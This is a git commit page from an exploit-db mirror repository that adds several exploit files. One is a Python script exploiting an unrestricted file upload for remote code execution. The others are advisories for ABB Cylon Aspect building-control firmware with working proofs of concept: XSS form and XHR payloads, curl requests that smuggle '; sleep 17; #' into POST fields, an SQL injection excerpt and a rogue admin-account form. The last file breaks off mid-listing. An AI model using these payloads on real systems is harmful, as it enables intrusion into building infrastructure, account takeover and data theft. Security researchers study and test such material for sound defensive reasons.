bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-17 00:01:19 +00:00
commit 4a70237d12
22 changed files with 2333 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

96
exploits/java/webapps/52206.py Executable file
View file

@ -0,0 +1,96 @@
# Exploit Title: Unrestricted File Upload
# Google Dork:
# Date: 14/Nov/2024
# Exploit Author: d3sca
# Vendor Homepage:
https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link:
https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 0.1
# Tested on: Debian Linux
# CVE : CVE-2024-52302
# Steps to Reproduce:
# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html).
# GET the file location: Send GET request /api/v1/customer/my-profile , grap the file location in response with the profile's link.
# Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response.
# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.
import requests
import argparse
import sys
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def login(url, username, password):
"""Authenticate with the API and return the Bearer token."""
login_endpoint = f"{url}/api/v1/user/login"
headers = {"Content-Type": "application/json"}
payload = {
"username": username,
"password": password
}
try:
response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
response.raise_for_status()
# Extract token
token = response.json().get("token")
if not token:
print("[!] Token not found in response. Exiting.")
sys.exit(1)
print("[+] Authentication successful. Token acquired.")
return token
except Exception as e:
print(f"[!] Login failed: {e}")
sys.exit(1)
def upload_file(url, token, file_path):
"""Upload a file to the profile picture endpoint using the Bearer token."""
upload_endpoint = f"{url}/api/v1/customer/profile-picture"
headers = {
"Authorization": f"Bearer {token}"
}
files = {
"file": open(file_path, "rb")
}
try:
response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
response.raise_for_status()
if response.status_code == 200:
print("[+] File uploaded successfully.")
print(f"[+] Response: {response.text}")
else:
print(f"[!] Failed to upload file. Status code: {response.status_code}")
print(f"[!] Response: {response.text}")
except Exception as e:
print(f"[!] File upload failed: {e}")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
parser.add_argument("-u", "--username", required=True, help="Username for login")
parser.add_argument("-p", "--password", required=True, help="Password for login")
parser.add_argument("-f", "--file", required=True, help="File to upload")
parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")
args = parser.parse_args()
# Authenticate
token = login(args.url, args.username, args.password)
# Upload the file
upload_file(args.url, token, args.file)
if __name__ == "__main__":
main()

85
exploits/multiple/hardware/52214.txt Normal file
View file

@ -0,0 +1,85 @@
ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site
scripting vulnerability. Input passed to the 'host' POST parameter is not
properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML/JS code in a user's browser session in context of
an affected site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5906
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php
CVE ID: CVE-2024-6516
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<body>
<form action="http://192.168.73.31/licenseServerUpdate.php" method="post">
<input type="hidden" name="licenseServer" value="Server" />
<input type="hidden" name="host" value="'><script>confirm(document.domain)</script>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

115
exploits/multiple/hardware/52215.txt Normal file
View file

@ -0,0 +1,115 @@
ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
stored cross-site scripting (XSS) vulnerability. This can be exploited by
uploading a malicious .txt file containing an XSS payload, which is stored
on the server and served back to users. Although the filename is sanitized
via the filename POST parameter, the file contents are not inspected or
sanitized, allowing attackers to inject arbitrary client-side scripts that
execute in the context of any user accessing the infected file or related
web page (license.php). To bypass file upload checks, the request must include
the Variant string enabling the upload process for potential exploitation.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5905
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php
CVE ID: CVE-2024-6516
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<html>
<body>
<script>
function storeit()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.73.31\/licenseUpload.php", true);
xhr.setRequestHeader("Accept-Language", "mk-MK,mk;q=0.7");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarymcNoKljWbBWAldlr");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
xhr.withCredentials = true;
var body = "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
"Content-Disposition: form-data; name=\"userfile\"; filename=\"test.txt\"\r\n" +
"Content-Type: text/lic\r\n" +
"\r\n" +
"Variant = AspectMAX\r\n" +
"\x3cscript\x3econfirm(251)\x3c/script\x3e\r\n" +
"------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Upload\r\n" +
"------WebKitFormBoundarymcNoKljWbBWAldlr--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
storeit();
</script>
<form action="#">
<input type="button" value="Post" onclick="storeit();" />
</form>
</body>
</html>

86
exploits/multiple/hardware/52216.txt Normal file
View file

@ -0,0 +1,86 @@
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
OS command injection vulnerability. This can be exploited to inject and execute
arbitrary shell commands through the contents of an uploaded .db file, which
is passed to the copyFile.sh script. Although the filename is sanitized, the
contents of the .db file are not, allowing attackers to inject malicious commands
that are executed on the server.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5904
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php
CVE ID: CVE-2024-48839
CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -s http://192.168.73.31/uploadDb.php \
> -H "Cookie: PHPSESSID=xxx" \
> -F "userfile=@testingus.db"
$ curl http://192.168.73.31/database/testingus.db

103
exploits/multiple/hardware/52217.txt Normal file
View file

@ -0,0 +1,103 @@
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
blind command injection vulnerability. Input passed to several POST parameters
is not properly sanitized when writing files, allowing attackers to execute
arbitrary shell commands on the system. There is also an off-by-one error in
array access that could lead to undefined behavior and potential DoS.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5903
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit
$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=Submit

79
exploits/multiple/hardware/52220.txt Normal file
View file

@ -0,0 +1,79 @@
ABB Cylon Aspect 3.08.03 (CookieDB) SQL Injection
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from an SQL injection through the
key and user parameters. These inputs are not properly sanitized and do not
utilize stored procedures, allowing attackers to manipulate SQL queries and
potentially gain unauthorized access to the database or execute arbitrary SQL
commands.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5900
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5900.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ ./sqli.py -2 CookieDb.java
removeUserCookie() -> DELETE FROM Cookies WHERE Key=\"" + key + "\"" + " AND " + "User" + "=\"" + user + "\"";
getAllUserCookies() -> SELECT * FROM Cookies WHERE User=\"" + user + "\"";

86
exploits/multiple/hardware/52221.txt Normal file
View file

@ -0,0 +1,86 @@
ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from a weak password policy, allowing
users to set overly simplistic or blank passwords and usernames without restrictions.
This vulnerability significantly reduces account security, enabling attackers
to exploit weak credentials for unauthorized access to the system.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5898
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5898.php
CVE ID: CVE-2024-48845
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48845
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="admin2" />
<input type="hidden" name="PASSWORD" value="7" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Setirkaj." />
</form>
</body>
</html>

79
exploits/multiple/hardware/52224.txt Normal file
View file

@ -0,0 +1,79 @@
ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The application suffers from cleartext transmission and storage of
sensitive information in a Cookie. This includes the globals parameter, where
authdata contains base64-encoded credentials. A remote attacker can intercept
the HTTP Cookie, including authentication credentials, through a man-in-the-middle
attack, potentially compromising user accounts and sensitive data.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
